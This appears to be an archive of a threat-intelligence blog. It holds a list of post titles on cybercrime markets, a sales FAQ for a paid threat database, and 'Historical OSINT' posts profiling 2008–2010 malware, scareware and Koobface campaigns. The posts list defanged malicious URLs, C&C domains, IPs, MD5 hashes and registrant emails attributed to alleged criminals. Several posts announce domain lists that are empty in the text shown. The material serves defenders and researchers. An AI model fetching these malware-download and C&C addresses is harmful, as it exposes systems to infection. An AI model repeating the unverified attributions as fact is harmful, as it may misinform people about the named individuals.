• [406]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail of client-side exploits – part two

• [407]How cybercriminals efficiently violate YouTube, Facebook, Twitter, Instagram, SoundCloud and Google+’s ToS

• [408]Tumblr under fire from DIY CAPTCHA-solving, proxies-supporting automatic account registration tools

• [409]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercriminals with bulletproof hosting capabilities – part three

• [410]Cybercriminals offer fellow cybercriminals training in Operational Security (OPSEC)

• [411]Fake ‘WhatsApp Missed Voicemail’ themed emails lead to pharmaceutical scams

• [412]A peek inside the booming underground market for stealth Bitcoin/Litecoin mining tools

• [413]Cybercrime Trends 2013 – Year in Review

22. January - 2014

• [414]‘Adobe License Service Center Order NR’ and ‘Notice to appear in court’ themed malicious spam campaigns intercepted in the wild

• [415]Vendor of TDoS products resets market life cycle of well known 3G USB modem/GSM/SIM card-based TDoS tool

• [416]New TDoS market segment entrant introduces 96 SIM cards compatible custom GSM module, positions itself as market disruptor

• [417]DIY Python-based mass insecure WordPress scanning/exploting tool with hundreds of pre-defined exploits spotted in the wild

• [418]Google’s reCAPTCHA under automatic fire from a newly launched reCAPTCHA-solving/breaking service

• [419]Fully automated, API-supporting service, undermines Facebook and Google’s ‘SMS/Mobile number activation’ account registration process

• [420]Newly launched managed ‘compromised/hacked accounts E-shop hosting as service’ standardizes the monetization process

• [421]Newly released Web based DDoS/Passwords stealing-capable DIY botnet generating tool spotted in the wild

• [422]Cybercriminals release new Web based keylogging system, rely on penetration pricing to gain market share

23. February - 2014

• [423]Cybercriminals release Socks4/Socks5 based Alexa PageRank boosting application

• [424]Market leading ‘standardized cybercrime-friendly E-shop’ service brings 2500+ boutique E-shops online

• [425]Managed TeamViewer based anti-forensics capable virtual machines offered as a service

• [426]Malicious campaign relies on rogue WordPress sites, leads to client-side exploits through the Magnitude exploit kit

• [427]‘Hacking for hire’ teams occupy multiple underground market segments, monetize their malicious ‘know how’

• [428]DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure

• [429]Spamvertised ‘Image has been sent’ Evernote themed campaign serves client-side exploits

• [430]Spamvertised ‘You received a new message from Skype voicemail service’ themed emails lead to Angler exploit kit

24. March - 2014

• [431]Deceptive ads expose users to PUA.InstallBrain/PC Performer PUA (Potentially Unwanted Application)

• [432]Managed Web-based 300 GB/s capable DNS amplification enabled malware bot spotted in the wild

• [433]Commercial Windows-based compromised Web shells management application spotted in the wild – part two

• [434]Multiple spamvertised bogus online casino themed campaigns intercepted in the wild

• [435]5M+ harvested Russian mobile numbers service exposes fraudulent infrastructure

• [436]Socks4/Socks5 enabled hosts as a service introduces affiliate network based revenue sharing scheme

• [437]A peek inside a modular, Tor C&C enabled, Bitcoin mining malware bot

• [438]Managed anti-forensics IMEI modification services fuel growth in the non-attributable TDoS market segment

• [439]Commercially available database of 52M+ ccTLD zone transfer domains spotted in the wild

• [440]Deceptive ads expose users to the Adware.Linkular/Win32.SpeedUpMyPC.A PUAs (Potentially Unwanted Applications)

• [441]DIY automatic cybercrime-friendly ‘redirector generating’ service spotted in the wild – part two

• [442]Managed DDoS WordPress-targeting, XML-RPC API abusing service, spotted in the wild

24. May - 2014

• [443]Legitimate software apps impersonated in a blackhat SEO-friendly PUA (Potentially Unwanted Application) serving campaign

• [444]DIY cybercrime-friendly (legitimate) APK injecting/decompiling app spotted in the wild

• [445]Malicious DIY Java applet distribution platforms going mainstream – part two

• [446]Spamvertised ‘Error in calculation of your tax’ themed emails lead to malware

• [447]A peek inside a subscription-based DIY keylogging based type of botnet/malware generating tool

• [448]Spamvertised ‘Notification of payment received’ themed emails lead to malware

• [449]Malicious JJ Black Consultancy ‘Computer Support Services’ themed emails lead to malware

• [450]A peek inside a newly launched all-in-one E-shop for cybercrime-friendly services

• [451]Long run compromised accounting data based type of managed iframe-ing service spotted in the wild

Enjoy!

Introducing Threat Data - The World’s Most Comprehensive Threats Database (2018-09-20 16:30)

Dear blog readers, I wanted to take the time and effort to introduce you to Threat Data - the World’s Most Comprehensive Threats Database, a proprietary invite-only MISP-based data, information and knowledge sharing community managed and operated by me, which represents the vast majority of the proprietary threat intelligence research that I produce on a daily basis these days.

Users and organizations familiar with my research may be interested in obtaining access to Threat Data, including a possible sample or a trial of the service.

Find below a sample FAQ about Threat Data and consider obtaining access to ensure that you and your organization remain on top of your game and ahead of current and emerging threats.

01. How to request access, including a possible trial and API access?

Approach me at ddanchev@cryptogroup.net

02. How do I obtain automated access?

The database is delivered daily/weekly/quarterly in MISP-friendly JSON-capable format including STIX coverage.

03. How to request a sample?

Users interested in requesting a sample can approach me at dancho.danchev@hush.com and I’d be more than happy

to offer a recent threat intelligence research snapshot.

04. Tell me more about the pricing options?

Monthly subscriptions covering daily, weekly and monthly updates start at $4,000, including guaranteed access to 24-32 analyses on a daily basis and active in-house all-source analysis, guaranteeing that your organization remains on top of its game by possessing the necessary data, information and knowledge to stay ahead of current and emerging threats.

05. What does the database cover?

- Russian Business Network coverage

- Koobface Botnet coverage

- Kneber Botnet coverage

- Hundreds of IOCs (Indicators of Compromise)

- Tactics, Techniques and Procedures In-Depth Coverage

- Malicious and fraudulent infrastructure mapped and exposed

- Malicious and fraudulent Blackhat SEO coverage

- Malicious spam and phishing campaigns

- Malicious and fraudulent scareware campaigns

- Malicious and fraudulent money mule recruitment scams

- Malicious and fraudulent reshipping mule recruitment scams

- Web based mass attack compromise fraudulent and malicious campaigns

- Malicious and fraudulent client-side exploits serving campaigns

The database also offers active malvertising, scareware, rogueware, malware, phishing, spam, IM malware, mobile malware, Mac OS X malware, Android malware, blackhat SEO, money mule recruitment, reshipping mule recruitment and ransomware coverage.

06. How often does it update?

Updates are issued on a daily, weekly and monthly basis, guaranteeing unlimited access to in-house all-source analysis and to daily, weekly and monthly updates.

Enjoy!

Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected (2018-10-19 18:17)

In 2008 it became evident that a widespread malware-embedded attack took place, successfully affecting hundreds of iPowerWeb customers and potentially exposing hundreds of legitimate Web sites to a multitude of malicious software, courtesy of a well known [1]Russian Business Network’s hosting provider - HostFresh.

In this post we’ll profile the campaign, provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. We’ll also establish a direct connection between the campaign’s infrastructure and the [2]Russian Business Network.

Malicious URL: hxxp://58.65.232.33/gpack/index.php

Related malicious URLs known to have participated in the campaign:

hxxp://58.65.232.25/counter/getexe.php?h=11

hxxp://58.65.232.25/counter/getfile.php?f=pdf

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html

2. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits (2018-10-19 22:46)

According to [1]security researchers the [2]Gumblar botnet is making a comeback, successfully affecting thousands of users globally and potentially compromising the confidentiality, availability and integrity of the targeted hosts by exposing them to a multitude of malicious client-side exploits serving domains that further drop malicious software on the affected hosts.

In this post we’ll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Malicious URLs known to have participated in the campaign:

hxxp://ncenterpanel.cn/php/unv3.php

hxxp://ncenterpanel.cn/php/p31.php

Related malicious MD5s known to have participated in the campaign:

MD5: 3f5b905c86d4dcaab9c86eddff1e02c7

MD5: 61461d9c9c1954193e5e0d4148a81a0c

MD5: 65cd1da3d4cc0616b4a0d4a862a865a6

MD5: 7de29e5e10adc5d90296785c89aeabce

Sample URL redirection chain:

hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.comi

hxxp://gumblar.cn/rss/?id=2

hxxp://gumblar.cn/rss/?id=3

Related malicious domains known to have participated in the campaign:

hxxp://martuz.cn - 95.129.145.58

With Gumblar making a comeback it’s becoming evident that cybercriminals continue utilizing the usual set of malicious and fraudulent tactics for the purpose of spreading malicious software and affecting hundreds of thousands of legitimate Web sites in a cost-effective and efficient way.

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://en.wikipedia.org/wiki/Gumblar

2. https://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

Historical OSINT - A Diverse Portfolio of Fake Security Software (2018-10-20 20:22)

In this post I’ll profile a currently circulating circa 2008 malicious and fraudulent scareware-serving campaign successfully enticing users into interacting with rogue and fraudulent fake security software, with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate-network based type of revenue-sharing scheme.

Related malicious domains known to have participated in the campaign:


We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Calling Zeus Home (2018-10-20 20:25)

Remember ZeuS? The infamous crimeware-in-the-middle exploitation kit? In this post I’ll provide historical OSINT

on various ZeuS-themed malicious and fraudulent campaigns intercepted throughout 2008 and provide actionable

intelligence on the infrastructure behind the campaign.

Related malicious domains known to have participated in the campaign:


We’ll continue monitoring the campaign and post updates as soon as new developments take place.


Historical OSINT - Chinese Government Sites Serving Malware (2018-10-20 20:28)

It’s 2008 and I’m stumbling upon yet another decent portfolio of compromised malware-serving Chinese government

Web sites. In this post I’ll discuss in-depth the campaign and provide actionable intelligence on the infrastructure

behind it.

Compromised Chinese government Web site:

hxxp://nynews.gov.cn

Sample malicious domains known to have participated in the campaign:

hxxp://game1983.com/index.htm

hxxp://sp.070808.net/23.htm

hxxp://higain-hitech.com/mm/index.html

Currently affected Chinese government Web sites:

hxxp://www.tgei.gov.cn/dom.txt - iframe - hxxp://www.b110b.com/chbr/110.htm?id=884191

hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - hxxp://nnbzc12.kki.cn/indax.htm

hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

hxxp://xc.haqi.gov.cn/jay.htm - iframe - hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm

hxxp://www.whkx.gov.cn/mohajem.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware (2018-10-20 20:29)

It’s 2010 and I’ve recently intercepted a widespread Bebo malicious malware-serving campaign successfully enticing users into interacting with the fraudulent and malicious content, potentially compromising the confidentiality, availability and integrity of the targeted host and exposing it to a multitude of malicious software.

Sample malicious domains known to have participated in the campaign:

hxxp://boss.gozbest.net/xd.html - 216.32.83.110

hxxp://tafficbots.com/in.cgi?6

hxxp://bolapaqir.com/in.cgi?2

hxxp://mybig-porn.com/promo4/?aid=1339

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circulating (2018-10-20 22:10)

It’s 2010 and I’ve recently intercepted a currently circulating malicious and fraudulent malware-serving spam campaign successfully enticing hundreds of thousands of users globally into interacting with the rogue and malicious software found on the compromised hosts, in combination with a currently active Twitter malware-serving campaign successfully enticing users into interacting with the rogue and bogus content.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Sample malicious domains known to have participated in the campaign:


hxxp://su7.us/tds/go.php?sid=1

Sample URL redirection chain:

hxxp://66.199.229.253/etds/go.php?sid=4 -> hxxp://mybig-porn.com/promo1/?aid=1470 -> hxxp://online-adult-directory.com/?aid=10012 -> hxxp://yourdatingnetwork.com/?aid=697

Sample malware known to have participated in the campaign:

MD5: a4ff9c2b4fd6917d12e962a7b6173143

Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild (2018-10-20 22:28)

It’s 2010 and I’ve recently stumbled upon yet another massive blackhat SEO campaign courtesy of the Koobface gang, successfully exposing hundreds of thousands of users to a multitude of malicious software.

In this post I’ll provide actionable intelligence on the infrastructure behind it and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample domains known to have participated in the campaign:

hxxp://jhpegdueeunz.55fast.com

hxxp://vzhusyeeaubk.55fast.com

hxxp://cvzizliiustw.55fast.com

hxxp://zetaswuiouax.55fast.com

hxxp://shzopfioarpd.55fast.com

hxxp://nqpubruioeat.55fast.com

hxxp://krrepteievdr.55fast.com

hxxp://gtoancoiuyqv.55fast.com

hxxp://felopfooaydk.55fast.com

hxxp://dknejxaeozjb.55fast.com

hxxp://ljperwaaoxjs.55fast.com

hxxp://hxmagxaeulbn.55fast.com

hxxp://mueombooikgp.55fast.com

hxxp://gluezneoolhs.55fast.com

hxxp://ptpodseeanvk.55fast.com

hxxp://jgdeyraoojdr.55fast.com

hxxp://kjsetqaoojdr.55fast.com

hxxp://kvuelveuicmn.55fast.com

hxxp://ywoamnooikfp.55fast.com

hxxp://dnkopgioawss.55fast.com

hxxp://qjtepyaoigts.55fast.com

hxxp://fdsudpeeewam.55fast.com

hxxp://qumobxoiigst.55fast.com

hxxp://fkvahzaeibbz.55fast.com

hxxp://lxxikhiuutwm.55fast.com

hxxp://meboczoiikgy.55fast.com

hxxp://mevoxliiidyq.55fast.com

hxxp://hxvoysaoozhp.55fast.com

hxxp://wiaabcoookfs.55fast.com

hxxp://wlbatgeeiohc.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://narezxaauggf.55fast.com

hxxp://gdsetqaoocks.55fast.com

hxxp://ptxihhiiihpq.55fast.com

hxxp://ramilhueamxg.55fast.com

hxxp://vvnoxliiigsp.55fast.com

hxxp://ywweypeaeemz.55fast.com

hxxp://rqqetweeupwn.55fast.com

hxxp://fprewmaoojpn.55fast.com
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hxxp://kbmahjiiigpw.55fast.com

hxxp://romozjuuurov.55fast.com

hxxp://tmxufseaacks.55fast.com

hxxp://viaegjiooeun.55fast.com

hxxp://znmasdiiicbc.55fast.com

hxxp://gdbiczooaoaw.55fast.com

hxxp://boqegkooouom.55fast.com

hxxp://xncoxloiiwrm.55fast.com

hxxp://flxowreuuhkb.55fast.com

hxxp://zzkihgiuupwb.55fast.com

hxxp://gxcobmeeuvls.55fast.com

hxxp://wygimweuizxz.55fast.com

hxxp://winowmeaoxhy.55fast.com

hxxp://hhpewmaoidtm.55fast.com

hxxp://nemoxloiixlh.55fast.com

hxxp://bvbowvooigtq.55fast.com

hxxp://pgmassuiixvx.55fast.com

hxxp://vbxoxkiiijst.55fast.com

hxxp://clnobhaoobzf.55fast.com

hxxp://proawnaoozxf.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://romwrpueerr.007gb.com

hxxp://rtperweaauux.5nxs.com

hxxp://prougpeeabzd.hostevo.com

hxxp://stwermoiigwc.10fast.net

hxxp://znmasdiiicbc.55fast.com

hxxp://gjxotyuuobmv.007sites.com

Sample malicious domains known to have participated in the campaign:

hxxp://dpfujhiuijhd.hostevo.com

hxxp://gfhizliiikjd.hostevo.com

hxxp://driozkuueqic.hostevo.com

hxxp://rrkihfuuuspr.hostevo.com

hxxp://xzkikhueeivf.hostevo.com

hxxp://trqawmaookgp.hostevo.com

hxxp://hggudseuerqn.hostevo.com

hxxp://phveflaeulmn.hostevo.com

hxxp://cvxiljiuuyrm.hostevo.com

hxxp://fdseffuueqiv.hostevo.com

hxxp://dsteyraaaxgr.hostevo.com

hxxp://pfjocbeuiznb.hostevo.com

hxxp://ccziljiuurab.hostevo.com

Sample malicious domains known to have participated in the campaign:

hxxp://jgfuspeeeauc.hostevo.com

hxxp://grioxhueoxlf.hostevo.com

hxxp://dpdilkiiihfy.hostevo.com

hxxp://miuonbaoifwv.hostevo.com

hxxp://fpteymoiuqmj.hostevo.com
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hxxp://dyoovziuebvj.hostevo.com

hxxp://rpdojzaaesgg.hostevo.com

hxxp://zzkuhguuewib.hostevo.com

hxxp://bqyunruiaecw.hostevo.com

hxxp://sruoljiuurqb.hostevo.com

hxxp://stratreaaebk.hostevo.com

hxxp://kjsetwaookdt.hostevo.com

hxxp://prougpeeabzd.hostevo.com

hxxp://nrfitdioaoyd.hostevo.com

hxxp://cxligdueewoc.hostevo.com

hxxp://tqaawmaoamvj.hostevo.com

hxxp://qunoxliiifyw.hostevo.com

hxxp://zkfusteaanch.hostevo.com

hxxp://qumobcooozjf.hostevo.com

hxxp://sqqawmaaamvj.hostevo.com

hxxp://klguyraoojdr.hostevo.com

hxxp://fspespueeiez.hostevo.com

hxxp://sjcadjoaepfh.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://sjcadjoaepfh.55fast.com

hxxp://pkbadlaeujcv.55fast.com

hxxp://vnvocziiifst.55fast.com

hxxp://wauanbooikfy.55fast.com

hxxp://yovikdeaanch.55fast.com

hxxp://jvuelvaeukcc.55fast.com

hxxp://lkgufpeeaunz.55fast.com

hxxp://kjfufseeeiml.55fast.com

hxxp://bmmoxliiifdt.55fast.com

hxxp://nqtuxneuixbb.55fast.com

hxxp://wioabnaoikfp.55fast.com

hxxp://ssdikzaaaiiq.55fast.com

hxxp://rwaammaaeowm.55fast.com

hxxp://ljifsueaumz.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://lljifsueaumz.55fast.com

hxxp://nbzigpeaoksq.55fast.com

hxxp://mvjufraoidqb.55fast.com

hxxp://hgdupraoisqc.55fast.com

hxxp://khdudseeeauc.55fast.com

hxxp://fspetwaaabxh.55fast.com

hxxp://tqoavxoiidyq.55fast.com

hxxp://xeaubwuiardg.55fast.com

hxxp://nbvoncooolhp.55fast.com

hxxp://wexigpaoambl.55fast.com

hxxp://klhuggiuufdt.55fast.com

hxxp://dxwetteoigst.55fast.com

hxxp://glvashoaeygj.55fast.com

hxxp://xmoejcaeujxc.55fast.com
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Sample malicious domains known to have participated in the campaign:

hxxp://jfsfkfuueqw.007gb.com

hxxp://bbxcimoiify.007gb.com

hxxp://ljgjxkueewi.007gb.com

hxxp:///xzkgkguueaa.007gb.com

hxxp://wmhjvkuaabj.007gb.com

hxxp://yqbzmciuupt.007gb.com

hxxp://lvxvieaoizj.007gb.com

hxxp://srnvuioookf.007gb.com

hxxp://melhlhueeqe.007gb.com

hxxp://lkhjclueuwa.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://lkhjclueuwa.007gb.com

hxxp://bvgsfyaooxh.007gb.com

hxxp://xbkhceeuifd.007gb.com

hxxp://ywncmvoiojf.007gb.com

hxxp://kjptpwaaacl.007gb.com

hxxp://gpmcumooavx.007gb.com

hxxp://dpwnaioookf.007gb.com

hxxp://stqnaiaoihd.007gb.com

hxxp://fspygfuuerq.007gb.com

hxxp://wbgtsyeaamb.007gb.com

hxxp://fprmwoaaavl.007gb.com

hxxp://mmxlnvoiijd.007gb.com

hxxp://vvllnmooocl.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://vvllnmooocl.007gb.com

hxxp://zlgsgpeaabz.007gb.com

hxxp://ccjfxleeewq.007gb.com

hxxp://cvhfjguueqi.007gb.com

hxxp://lhprsraaack.007gb.com

hxxp://razzbciiupt.007gb.com

hxxp://rancoeooozh.007gb.com

hxxp://muczimoooxh.007gb.com

hxxp://tphotdioetdf.hostevo.com

hxxp://vvxifpeaocks.hostevo.com

hxxp://jjhillooolhf.hostevo.com

hxxp://bzxixliiudpr.hostevo.com

hxxp://xmvovxooozhp.hostevo.com

hxxp://proocziuuprm.hostevo.com

hxxp://qebovziuuswb.hostevo.com

hxxp://xzhusteaabzs.hostevo.com

hxxp://bbbovxiuifyq.hostevo.com

Sample malicious domains known to have participated in the campaign:

hxxp://dpretqaoocjy.hostevo.com

hxxp://ywaaqbaoozjs.5nxs.com
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hxxp://fsyepteaaenl.5nxs.com

hxxp://jhgufpeeeaic.5nxs.com

hxxp://dsterqaaoczg.5nxs.com

hxxp://rivilhueeiuc.5nxs.com

hxxp://znouxneuaayd.5nxs.com

hxxp://kkgijguueonh.5nxs.com

hxxp://khsamvooihdt.5nxs.com

hxxp://nncikgueaflg.5nxs.com

hxxp://fdpixnaaaoiv.5nxs.com

hxxp://zzzikhiiihfy.5nxs.com

hxxp://sqaayteaaimz.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://goadult.info/go.php?sid=13 -> hxxp://goadult.info/go.php?sid=9 -> hxxp://r2606.com/go/?pid=30937, which is a well known Koobface 1.0 command and control server domain.

Related malicious redirectors known to have participated in the campaign:

hxxp://goadult.info - 78.109.28.16 - tech@goadult.info

hxxp://go1go.net - 174.36.214.32 - tech@go1go.net

hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info
Historical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connection (2018-10-20 22:34)

It’s 2010 and we’ve recently stumbled upon yet another malicious and fraudulent campaign courtesy of the Koobface gang, actively serving fake security software, also known as scareware, to a variety of users. The majority of the malicious software is conveniently parked within 79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP, which is successfully hosting a diverse portfolio of fake security software.

In this post, I’ll provide actionable intelligence on the infrastructure behind the campaign and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample malware known to have participated in the campaign:

installer.1.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef - Trojan.Crypt.ZPACK.Gen; Mal/FakeAV-CQ - Result: 9/40 (22.50 %)

Related malicious phone back C&C server IPs:

hxxp://av-plusonline.org/install/avplus.dll

hxxp://av-plusonline.org/cb/real.php?id=

Related malicious MD5s known to have participated in the campaign:

avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - FakeAlert-LF; Mal/FakeAV-CL - Result: 6/39 (15.39 %)

It gets even more interesting, as hxxp://fast-payments.com - 91.188.59.27 is parked within the Koobface botnet’s 1.0 phone back locations (hxxp://urodinam.net) and is also hosted within the same netblock at 91.188.59.10.

Sample related malicious URLs known to have participated in the campaign:

hxxp://urodinam.net/33t.php?stime=125558

- hxxp://91.188.59.10/opa.exe - MD5: d4aacc8d01487285be564cbd3a4abc76 - Downloader.VB.7.S; Mal/Koobface-B - Result: 10/40 (25 %)

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://aburvalg.com/new1.php - 64.27.0.237

- hxxp://fucking-tube.net

The following domains use it as a name server:

hxxp://ns1.addedantivirus.com

Related malicious domains known to have responded to the same malicious name server:


Related malicious URLs known to have participated in the campaign:

hxxp://avplus-online.org/buy.php?id=

- hxxp://fast-payments.com/index.php?prodid=antivirplus_02_01&afid=

Related malicious domains known to have participated in the campaign:

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - Massive Scareware Dropping Campaign Spotted in the Wild (2018-10-20 22:38)

It’s 2008 and I’ve recently spotted a currently circulating portfolio of malicious and fraudulent scareware-serving domains, which I’ll expose in this post with the idea to share actionable threat intelligence with the security community, further exposing and undermining the cybercrime ecosystem the way we know it, and potentially empowering security researchers and third-party vendors with the necessary data to stay ahead of current and emerging threats.

Related malicious domains known to have participated in the campaign:

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - Malware Domains Impersonating Google (2018-10-20 22:51)

It’s 2008 and I’ve recently stumbled upon a currently active typosquatted portfolio of malware-serving domains successfully impersonating Google, further spreading malicious software to hundreds of thousands of unsuspecting users.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have participated in the campaign:

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 22:35)

It’s 2008 and I recently came across a pretty decent portfolio of rogue and fraudulent scareware-serving domains successfully acquiring traffic through a variety of black hat SEO techniques, in this particular case the airplane crash of the Polish president.

Related malicious domains known to have participated in the campaign:

Sample URL redirection chain:

hxxp://cooldesigns4u.co.uk/sifr.php

- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Email: johnvernet@gmail.com

- hxxp://scaner24.org/?affid=184 - 91.212.127.19 - Email: bobarter@xhotmail.net

Redirectors parked on 213.163.89.55 (AS49544, INTERACTIVE3D-AS Interactive3D) include:

We’ve already seen hxxp://google-analyze.org and hxxp://yahoo-analytics.net in several related [1]mass compromises of related Embassy Web Sites.

We’ll continue monitoring the campaign and post updates as new developments take place.

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html
Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild - Part Two (2018-10-21 22:47)

It’s 2008 and I’ve recently come across a massive black hat SEO campaign successfully enticing users into falling victim to a fraudulent and malicious scareware-serving campaign. In this post I’ll provide actionable intelligence on the infrastructure behind it.

Related malicious domains and redirectors known to have participated in the campaign:

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang (2018-10-21 23:02)

It’s 2010 and I’ve recently come across a diverse portfolio of fake security software, also known as scareware, courtesy of the Koobface gang, in what appears to be a [1]direct connection between the gang’s activities and the Russian Business Network.

In this post I’ll provide actionable intelligence on the infrastructure behind it and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it, including the establishment of a direct connection between the gang’s activities and a well-known Russian Business Network customer.

Related malicious domains known to have participated in the campaign:

hxxp://piremover.eu/hitin.php?affid=02979 - 212.117.161.142; 95.211.27.154; 95.211.27.166

Once executed, a sample malware (MD5: eedac4719229a499b3118f87f32fae35) phones back to the following malicious C&C server IPs:

hxxp://xmiueftbmemblatlwsrj.cn/get.php?id=02979 - 91.207.116.44 - Email: robertsimonkroon@gmail.com

Related domains known to have responded to the same malicious C&C server IPs:

hxxp://aahsdvsynrrmwnbmpklb.cn

hxxp://dlukhonqzidfpphkbjpb.cn

hxxp://barykcpveiwsgexkitsg.cn

hxxp://bfichgfqjqrtkwrsegoj.cn

hxxp://dhbomnljzgiardzlzvkp.cn

Once executed, a sample malware phones back to the following malicious C&C service IPs:

hxxp://xmiueftbmemblatlwsrj.cn

hxxp://urodinam.net - which is a [2]well known [3]Koobface 1.0 C&C server domain IP also seen in the "[4]Mass DreamHost Sites Compromise" exclusively profiled in this post.

hxxp://xmiueftbmemblatlwsrj.cn

Once executed, a sample malware (MD5: 66dc85ad06e4595588395b2300762660; MD5: 91944c3ae4a64c478bfba94e9e05b4c5) phones back to the following malicious C&C server IPs:

hxxp://proxim.ntkrnlpa.info - 83.68.16.30 - seen and observed in related analysis regarding the [5]mass Embassy

Web site compromise throughout 2007 and 2009.

The sample then successfully drops the following malicious Koobface executable: hxxp://harmonyhudospa.se/.sys/?getexe=fb.70.exe

Related malicious MD5s known to have participated in the campaign:

MD5: 66dc85ad06e4595588395b2300762660

MD5: 8282ea8e92f40ee13ab716daf2430145

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://tehnocentr.chita.ru/.sys

hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

2. https://draft.blogger.com/
3. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

4. https://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html

5. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html
Historical OSINT - Profiling a Portfolio of Active 419-Themed Scams (2018-10-21 23:08)

It’s 2010 and I’ve recently decided to provide actionable intelligence on a variety of 419-themed scams, in particular the actual malicious actors behind the campaigns, with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns.

Related malicious and fraudulent emails known to have participated in the campaign:

Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 23:21)

It’s 2010 and I’ve recently stumbled upon yet another diverse portfolio of blackhat SEO domains, this time serving rogue security software, also known as scareware, to unsuspecting users. The cybercriminals behind the campaign are successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on an affiliate-network based revenue sharing scheme.

In this post I’ll profile the infrastructure behind the campaign and provide actionable intelligence on it.

Related malicious domains known to have participated in the campaign:

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Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:37)

It’s 2010 and I’ve recently intercepted a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving campaigns.

In this post I’ll profile the infrastructure behind the campaign and provide actionable intelligence on it.

Sample URL redirection chain:

hxxp://noticexsummary.com/re.php?lnk=1203597664 - 87.255.55.231

- hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677 - 66.207.172.196

= hxxps://secure-signupway.com/promo/join.aspx?siteid=3388

Related malicious domains known to have participated in the campaign:

hxxp://noticexsummary.com/

Related malicious domains known to have participated in the campaign:

hxxp://online-tv-on-your-pc.com/p2/index.asp?aff=11680&camp=unsub

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:47)

It’s 2010 and I’ve recently come across a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving campaigns.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have participated in the campaign:

Related malicious domains known to have participated in the campaign:

Related malicious domains known to have participated in the campaign:

hxxp://drivemedirect.com

hxxp://virtualblog5.com

hxxp://fastwebway.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Spamvertized Swine Flu Domains - Part Two (2018-10-21 23:50)

It’s 2010 and I’ve recently come across a currently active, diverse portfolio of Swine Flu related domains further enticing users into interacting with rogue and malicious content.

In this post I’ll profile and expose a currently active malicious domain portfolio circulating in the wild and involved in a variety of ongoing Swine Flu malicious spam campaigns, and will provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have participated in the campaign:

